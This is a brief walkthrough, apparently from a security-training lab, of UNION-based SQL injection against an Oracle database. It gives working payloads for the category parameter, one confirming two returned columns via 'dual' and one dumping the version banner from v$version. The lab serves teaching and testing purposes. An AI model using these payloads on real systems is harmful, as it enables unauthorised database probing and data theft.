- On Oracle databases, every
SELECTstatement must specify a table to selectFROM. If yourUNION SELECTattack does not query from a table, you will still need to include theFROMkeyword followed by a valid table name. - In the category params insert: — to verify that query returns two columns
'+UNION+SELECT+'abc','def'+FROM+dual--
- Use the following payload to display the database version:
'+UNION+SELECT+BANNER,+NULL+FROM+v$version--